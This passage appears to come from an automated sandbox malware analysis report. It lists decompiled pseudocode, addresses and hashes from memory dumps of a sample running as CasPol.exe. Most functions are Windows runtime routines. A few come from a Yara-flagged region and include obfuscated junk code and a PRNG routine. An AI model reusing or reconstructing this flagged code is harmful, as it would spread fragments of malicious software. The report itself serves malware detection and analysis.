						E013DBB2D(_t16, _t15);
						E013DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E013CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E013CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E013CFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                        0x013dc18d
                                                                        0x013dc18f
                                                                        0x013dc191
                                                                        0x013dc19b
                                                                        0x013dc1a0
                                                                        0x013dc1d4
                                                                        0x013dc1de
                                                                        0x01422d6e
                                                                        0x013dc1e4
                                                                        0x013dc1e4
                                                                        0x013dc1e4
                                                                        0x013dc1ec
                                                                        0x01422d7d
                                                                        0x01422d7d
                                                                        0x013dc1f3
                                                                        0x013dc1ff
                                                                        0x01422d88
                                                                        0x01422d8d
                                                                        0x01422d94
                                                                        0x01422d94
                                                                        0x01422d9f
                                                                        0x01422da4
                                                                        0x01422dab
                                                                        0x01422db0
                                                                        0x01422db2
                                                                        0x01422db3
                                                                        0x01422db4
                                                                        0x01422dbc
                                                                        0x01422dc3
                                                                        0x01422dc3
                                                                        0x013dc205
                                                                        0x013dc205
                                                                        0x013dc208
                                                                        0x013dc20e
                                                                        0x013dc211
                                                                        0x013dc216
                                                                        0x013dc219
                                                                        0x013dc21f
                                                                        0x013dc222
                                                                        0x013dc22c
                                                                        0x013dc234
                                                                        0x013dc23a
                                                                        0x013dc23f
                                                                        0x013dc245
                                                                        0x013dc24b
                                                                        0x013dc251
                                                                        0x013dc25a
                                                                        0x013dc276
                                                                        0x013dc27d
                                                                        0x013dc27d
                                                                        0x013dc25c
                                                                        0x013dc25c
                                                                        0x00000000
                                                                        0x013dc25e
                                                                        0x013dc1a4
                                                                        0x013dc1aa
                                                                        0x013dc1b3
                                                                        0x013dc265
                                                                        0x013dc26c
                                                                        0x013dc26c
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                        • Instruction ID: 76beec9089cc29ae901e2903f47c780e3dd938079c96eb29cf69e18f5fba43ef
                                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                        • Instruction Fuzzy Hash: 2031287360155BBEDB05EBB8D480BEAFB59BF52208F04415ED51C47301DB386A4AC7E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01437016 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E01437016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x14ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01436B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01436B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E013D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E013F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E013FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L013D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                        0x01437016
                                                                        0x0143701e
                                                                        0x0143702b
                                                                        0x01437033
                                                                        0x01437037
                                                                        0x0143703c
                                                                        0x0143703e
                                                                        0x01437041
                                                                        0x01437045
                                                                        0x0143704a
                                                                        0x01437050
                                                                        0x01437055
                                                                        0x0143705a
                                                                        0x01437062
                                                                        0x01437062
                                                                        0x0143705a
                                                                        0x01437064
                                                                        0x01437064
                                                                        0x01437067
                                                                        0x01437071
                                                                        0x01437096
                                                                        0x0143709b
                                                                        0x014370a2
                                                                        0x014370a6
                                                                        0x014370a7
                                                                        0x014370ad
                                                                        0x014370b3
                                                                        0x014370b6
                                                                        0x014370bb
                                                                        0x014370c3
                                                                        0x014370c3
                                                                        0x014370c6
                                                                        0x014370cd
                                                                        0x014370dd
                                                                        0x014370e0
                                                                        0x014370e2
                                                                        0x014370e2
                                                                        0x014370ee
                                                                        0x01437101
                                                                        0x014370f0
                                                                        0x014370f9
                                                                        0x014370f9
                                                                        0x0143710a
                                                                        0x0143710e
                                                                        0x01437112
                                                                        0x01437117
                                                                        0x01437118
                                                                        0x01437118
                                                                        0x014370bb
                                                                        0x0143711d
                                                                        0x01437123
                                                                        0x01437131
                                                                        0x01437131
                                                                        0x01437136
                                                                        0x0143713d
                                                                        0x0143713e
                                                                        0x0143713f
                                                                        0x0143714a
                                                                        0x0143714a
                                                                        0x01437084
                                                                        0x01437088
                                                                        0x00000000
                                                                        0x0143708e
                                                                        0x0143708e
                                                                        0x01437092
                                                                        0x00000000
                                                                        0x01437092

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa5efff0d0ed5902c7da70da9c129c1276294b24ab77916baada15065974cb96
                                                                        • Instruction ID: 068804a004036819a9f76b9e5e2e468be433fae66fb1031bfac77ef39be47430
                                                                        • Opcode Fuzzy Hash: fa5efff0d0ed5902c7da70da9c129c1276294b24ab77916baada15065974cb96
                                                                        • Instruction Fuzzy Hash: 4531A2B26047519BD721DF2CC840A6BB7A5BFC8600F054A2EF995977A0E730E904CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421821 Relevance: .1, Instructions: 98COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E00421821() {
				signed int _t11;
				signed int _t12;
				signed int _t13;
				intOrPtr _t15;
				signed char _t17;
				signed int _t19;
				signed int _t20;
				signed int _t21;
				signed int _t24;

				_t12 = _t11 ^ 0x0add1ee9;
				 *0xce406ce7 =  *0xce406ce7 ^ _t13;
				_t21 = _t20 ^  *0x67d44423;
				if(_t24 ==  *0xfd093b1f) {
					__eax = __eax -  *0x17c3467a;
					__edi = __edi & 0x058bef1f;
					__ecx =  *0xf8876d69 * 0xc40a;
					if(__ecx <= 0) {
						__ebp =  *0xa56d6b7f * 0xf0bb;
						_t6 = __eax;
						__eax =  *0xa3b6e16;
						 *0xa3b6e16 = _t6;
						__cl = __cl ^  *0x504aa14;
						__bl = __bl + 0xa0;
						asm("adc ecx, 0x6f1adf37");
						__esi = __esi - 0xfd580f3b;
						__edx = __edx - 0x6bc9ee99;
						 *0x77fc8195 = __edx;
						asm("rcl byte [0x5dd483a], 0x7c");
						asm("adc ebx, [0x7d001221]");
						if(__edx < 0) {
							 *0xcbb99671 =  *0xcbb99671 | __esp;
							_push(__ebp);
							if( *0xcbb99671 < 0) {
								 *0x7adfec79 =  *0x7adfec79 ^ __esi;
								asm("sbb eax, [0x24a3ebfa]");
								__esp = __esp | 0x2b34ca11;
								asm("cmpsb");
								__al = __al + 0x8a;
								asm("adc eax, [0xe58289fd]");
								__esi = __esi + 1;
								__esp = __esp & 0x5c79decb;
								asm("movsb");
								__ebp = __ebp + 1;
								 *0xc2be5c0b =  *0xc2be5c0b ^ __esi;
								__ch = __ch +  *0x8c7b7eb4;
								_pop(__edi);
								 *0xb88c21ee =  *0xb88c21ee << 0x5f;
								_t7 = __ecx;
								__ecx =  *0xdbcb8;
								 *0xdbcb8 = _t7;
								__esi = __esi +  *0x956f461f;
								__cl = __cl - 0x24;
								__esp = __esp ^  *0xed5d94cb;
								__edi =  *0x264ff7d3;
								 *0x112e1493 =  *0x112e1493 + __eax;
								__ebx = __ebx | 0xc9c9b983;
								asm("adc [0xdad977a0], dh");
								asm("sbb edx, [0x8b739d35]");
								__esp = __eax;
								__edi =  *0x472b3069 * 0xaf9a;
								__esp =  *0x5d47433f;
								 *0xb241bab2 =  *0xb241bab2 << 0x4b;
								__edi =  *0x472b3069 * 0xaf9a - 1;
								__ebx = __ebx + 0x45bb5607;
								__esp =  *0x4077cfdf;
								 *0x4077cfdf =  *0x5d47433f;
								asm("sbb cl, 0xa8");
								asm("cmpsb");
								 *0x4e88c618 =  *0x4e88c618 & __dh;
								_pop(__eax);
								asm("stosd");
							}
						}
					}
				}
				L1:
				asm("sbb [0xc36efb09], edx");
				asm("adc [0x767ba821], ebx");
				 *0x240d8bd4 =  *0x240d8bd4 >> 0;
				_t12 = _t12 & 0x0000000c;
				_t21 = (_t21 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
				 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
				asm("sbb ebp, [0x8771e3b]");
				_push(_t21);
				_t19 = _t19 &  *0x912dd0fb;
				_t17 = _t17 & 0x00000020;
				asm("rol byte [0xf89935f2], 0x22");
				asm("rol dword [0xfbe9540d], 0x6c");
				 *0x9459ca0a = _t15;
				 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
				asm("adc bl, [0xc320ed3c]");
				_t24 =  *0x1ac1b56a * 0x85fc;
				asm("scasb");
				_t15 =  *0x9459ca0a - 1;
				 *0xaab74829 =  *0xaab74829 ^ _t12;
				asm("rcl dword [0x7f106817], 0x35");
				asm("adc eax, [0x9d56ea15]");
				_t13 = _t13 +  *0x5ceec7ba &  *0x3b22d9f7;
				 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
				goto L1;
			}












                                                                        0x00421821
                                                                        0x00421826
                                                                        0x0042182c
                                                                        0x00421838
                                                                        0x0042183e
                                                                        0x00421846
                                                                        0x0042184e
                                                                        0x00421858
                                                                        0x0042185e
                                                                        0x00421868
                                                                        0x00421868
                                                                        0x00421868
                                                                        0x0042186e
                                                                        0x00421874
                                                                        0x00421877
                                                                        0x0042187d
                                                                        0x00421883
                                                                        0x00421889
                                                                        0x0042188f
                                                                        0x00421896
                                                                        0x0042189c
                                                                        0x004218a2
                                                                        0x004218a8
                                                                        0x004218a9
                                                                        0x004218af
                                                                        0x004218b5
                                                                        0x004218bb
                                                                        0x004218c1
                                                                        0x004218c2
                                                                        0x004218c4
                                                                        0x004218ca
                                                                        0x004218cb
                                                                        0x004218d1
                                                                        0x004218d2
                                                                        0x004218d3
                                                                        0x004218d9
                                                                        0x004218df
                                                                        0x004218e1
                                                                        0x004218e8
                                                                        0x004218e8
                                                                        0x004218e8
                                                                        0x004218ee
                                                                        0x004218f4
                                                                        0x004218f7
                                                                        0x004218fd
                                                                        0x00421906
                                                                        0x00421912
                                                                        0x00421918
                                                                        0x0042191e
                                                                        0x00421924
                                                                        0x00421925
                                                                        0x0042192f
                                                                        0x0042193b
                                                                        0x00421942
                                                                        0x0042194c
                                                                        0x00421952
                                                                        0x00421952
                                                                        0x00421958
                                                                        0x0042195b
                                                                        0x0042195c
                                                                        0x00421968
                                                                        0x00421969
                                                                        0x00421969
                                                                        0x004218a9
                                                                        0x0042189c
                                                                        0x00421858
                                                                        0x0042177d
                                                                        0x0042177d
                                                                        0x00421783
                                                                        0x00421789
                                                                        0x004217a2
                                                                        0x004217a5
                                                                        0x004217ab
                                                                        0x004217b2
                                                                        0x004217b8
                                                                        0x004217b9
                                                                        0x004217c5
                                                                        0x004217c8
                                                                        0x004217cf
                                                                        0x004217d6
                                                                        0x004217dc
                                                                        0x004217e9
                                                                        0x004217ef
                                                                        0x004217f9
                                                                        0x004217fa
                                                                        0x004217fb
                                                                        0x00421801
                                                                        0x00421808
                                                                        0x0042180e
                                                                        0x00421814
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                        • Instruction ID: 66b8aff2017cfeca453581ed2337e8374f4464e0b25fe9a780bace185d95b657
                                                                        • Opcode Fuzzy Hash: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                        • Instruction Fuzzy Hash: 33418872A18310CFE706DF35D85AB523FB1F352310F45416ED5A297992E7342626CF8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01463D40 Relevance: .1, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E01463D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x14ad360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E013D2280(_t34, 0x14a8a6c);
				_t64 =  *0x14a5768; // 0x77e15768
				if(_t64 != 0x14a5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77e15770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E013CFFB0(_t53, _t64, 0x14a8a6c);
						 *0x14ab1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E013D2280(_t45, 0x14a8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x14a5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E013CFFB0(_t51, _t64, 0x14a8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E013FB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                        0x01463d40
                                                                        0x01463d48
                                                                        0x01463d52
                                                                        0x01463d59
                                                                        0x01463d5d
                                                                        0x01463d61
                                                                        0x01463d63
                                                                        0x01463d67
                                                                        0x01463d69
                                                                        0x01463d72
                                                                        0x01463d76
                                                                        0x01463d7a
                                                                        0x01463d7f
                                                                        0x01463d8b
                                                                        0x01463d91
                                                                        0x01463d91
                                                                        0x01463d91
                                                                        0x01463d94
                                                                        0x01463d96
                                                                        0x01463d9d
                                                                        0x01463da1
                                                                        0x01463db0
                                                                        0x01463dba
                                                                        0x01463dbc
                                                                        0x01463dbc
                                                                        0x01463dc6
                                                                        0x01463dcb
                                                                        0x01463dcf
                                                                        0x01463dd1
                                                                        0x01463dd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01463dd9
                                                                        0x01463e0c
                                                                        0x01463e0c
                                                                        0x01463e0f
                                                                        0x01463ddb
                                                                        0x01463ddb
                                                                        0x01463de0
                                                                        0x00000000
                                                                        0x01463de2
                                                                        0x01463de2
                                                                        0x01463de4
                                                                        0x01463de8
                                                                        0x01463deb
                                                                        0x01463df1
                                                                        0x00000000
                                                                        0x01463df3
                                                                        0x01463df3
                                                                        0x01463df5
                                                                        0x01463df8
                                                                        0x01463dfa
                                                                        0x00000000
                                                                        0x01463dfa
                                                                        0x01463df1
                                                                        0x01463de0
                                                                        0x01463e11
                                                                        0x01463e11
                                                                        0x00000000
                                                                        0x01463dfe
                                                                        0x01463e04
                                                                        0x01463e06
                                                                        0x00000000
                                                                        0x01463e06
                                                                        0x00000000
                                                                        0x01463e04
                                                                        0x01463d91
                                                                        0x01463e15
                                                                        0x01463e1a
                                                                        0x01463e1f
                                                                        0x01463e1f
                                                                        0x01463e23
                                                                        0x01463e29
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01463e2e
                                                                        0x00000000
                                                                        0x01463e30
                                                                        0x01463e30
                                                                        0x01463e35
                                                                        0x00000000
                                                                        0x01463e37
                                                                        0x01463e3e
                                                                        0x01463e42
                                                                        0x01463e48
                                                                        0x01463e4e
                                                                        0x00000000
                                                                        0x01463e4e
                                                                        0x01463e35
                                                                        0x00000000
                                                                        0x01463e2e
                                                                        0x01463e5b
                                                                        0x01463e5c
                                                                        0x01463e5d
                                                                        0x01463e68
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afdd29e5e89009374b6d2b9e8a2270b4fb4304b7f079d0451099b42c2b7f4a9b
                                                                        • Instruction ID: 32cf07736ce7b3dc5c027d2d50965a46070fdb9a6062cacc83ac7175bf3f224c
                                                                        • Opcode Fuzzy Hash: afdd29e5e89009374b6d2b9e8a2270b4fb4304b7f079d0451099b42c2b7f4a9b
                                                                        • Instruction Fuzzy Hash: CA319971A09342DFC710DF18D98081ABFE9FF95618F45496EE4889B761D730ED05CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EA70E Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E013EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x14a7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x14a7b10 = 8;
					 *0x14a7b14 = 0x14a7b0c;
					 *0x14a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E013EA990(0x14a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L013EA840(__edx, __ecx, __ecx, _t52, 0x14a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x14a7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x14a7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x14a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L013D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x14a7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E013FF3E0(_t50,  *0x14a7b14, _t8 >> 3);
						_t28 =  *0x14a7b14; // 0x0
						__eflags = _t28 - 0x14a7b0c;
						if(_t28 != 0x14a7b0c) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x14a7b14 = _t50;
						_t48 = _v12;
						 *0x14a7b10 = _t9;
						goto L6;
					}
					 *0x14a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                        0x013ea713
                                                                        0x013ea714
                                                                        0x013ea717
                                                                        0x013ea71d
                                                                        0x013ea720
                                                                        0x013ea722
                                                                        0x013ea727
                                                                        0x013ea74a
                                                                        0x013ea754
                                                                        0x013ea75e
                                                                        0x013ea768
                                                                        0x013ea76a
                                                                        0x013ea773
                                                                        0x013ea78b
                                                                        0x013ea790
                                                                        0x013ea792
                                                                        0x013ea741
                                                                        0x013ea741
                                                                        0x013ea743
                                                                        0x013ea749
                                                                        0x013ea749
                                                                        0x013ea732
                                                                        0x013ea73a
                                                                        0x013ea797
                                                                        0x013ea79d
                                                                        0x013ea7a3
                                                                        0x013ea7a9
                                                                        0x013ea7b6
                                                                        0x013ea7bc
                                                                        0x013ea7ca
                                                                        0x013ea7e0
                                                                        0x013ea7e2
                                                                        0x013ea7e4
                                                                        0x01429bf2
                                                                        0x00000000
                                                                        0x01429bf2
                                                                        0x013ea7ed
                                                                        0x013ea7f2
                                                                        0x013ea800
                                                                        0x013ea805
                                                                        0x013ea80d
                                                                        0x013ea812
                                                                        0x01429c08
                                                                        0x01429c08
                                                                        0x013ea818
                                                                        0x013ea81b
                                                                        0x013ea821
                                                                        0x013ea824
                                                                        0x00000000
                                                                        0x013ea824
                                                                        0x013ea7ae
                                                                        0x00000000
                                                                        0x013ea7ae
                                                                        0x013ea73c
                                                                        0x013ea73e
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c863425d863754a8ac4a4609820d06741d66fba4ebc2a7adb1367776306f529e
                                                                        • Instruction ID: 78b762eb6e897f49a399b2d2b366a1935d5300805041d74e81a453107e2cf0fb
                                                                        • Opcode Fuzzy Hash: c863425d863754a8ac4a4609820d06741d66fba4ebc2a7adb1367776306f529e
                                                                        • Instruction Fuzzy Hash: 263120F22412159FC330CF08D880F65BFF9FB94349F92095AE201873A8D3729901CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004206B3 Relevance: .1, Instructions: 93COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004206B3(char* _a4) {
				signed int _t30;
				signed int _t35;
				signed int _t36;
				signed int _t55;
				intOrPtr _t56;
				signed int _t66;
				intOrPtr _t67;
				char* _t68;
				signed int _t78;
				signed int _t80;

				_t68 = _a4;
				if(_t68 != 0) {
					if( *_t68 == 0) {
						_t2 = _t68 + 4; // 0xfffd5885
						_t35 =  *_t2;
						 *_t68 = 1;
						_t56 =  *0x7ffe0018;
						_t67 =  *0x7ffe001c;
						if(_t35 == 0) {
							_t36 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
						} else {
							_t80 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
							_t36 = _t35 * _t80;
						}
						 *(_t68 + 8) = _t36;
						 *(_t68 + 0xc) = 0x249a;
						 *(_t68 + 0x10) = 0x6eea;
						 *(_t68 + 0x14) = 0x2392;
					}
					_t7 = _t68 + 8; // 0xfc33bff
					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
					_t8 = _t68 + 0xc; // 0x1c084
					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
					_t10 = _t68 + 0x10; // 0xa8e85000
					_t23 =  *_t10;
					_t11 = _t68 + 0x14; // 0x8b000121
					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
					_t12 = _t68 + 0x14; // 0x8b000121
					_t13 = _t68 + 0x14; // 0x8b000121
					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
					 *(_t68 + 0x14) = _t30;
					 *(_t68 + 0x10) = _t78;
					 *(_t68 + 8) = _t55;
					 *(_t68 + 0xc) = _t66;
					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
				} else {
					return 0;
				}
			}













                                                                        0x004206b7
                                                                        0x004206bc
                                                                        0x004206c8
                                                                        0x004206ca
                                                                        0x004206ca
                                                                        0x004206cd
                                                                        0x004206d0
                                                                        0x004206d6
                                                                        0x004206de
                                                                        0x004206ef
                                                                        0x004206f4
                                                                        0x004206f4
                                                                        0x004206e0
                                                                        0x004206e0
                                                                        0x004206e6
                                                                        0x004206e6
                                                                        0x004206ea
                                                                        0x004206ea
                                                                        0x004206f8
                                                                        0x004206fb
                                                                        0x00420702
                                                                        0x00420709
                                                                        0x00420709
                                                                        0x00420710
                                                                        0x0042072f
                                                                        0x00420731
                                                                        0x00420750
                                                                        0x00420752
                                                                        0x00420752
                                                                        0x00420771
                                                                        0x00420774
                                                                        0x00420780
                                                                        0x0042078d
                                                                        0x00420793
                                                                        0x00420795
                                                                        0x0042079a
                                                                        0x004207a3
                                                                        0x004207a6
                                                                        0x004207ad
                                                                        0x004206be
                                                                        0x004206c2
                                                                        0x004206c2

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
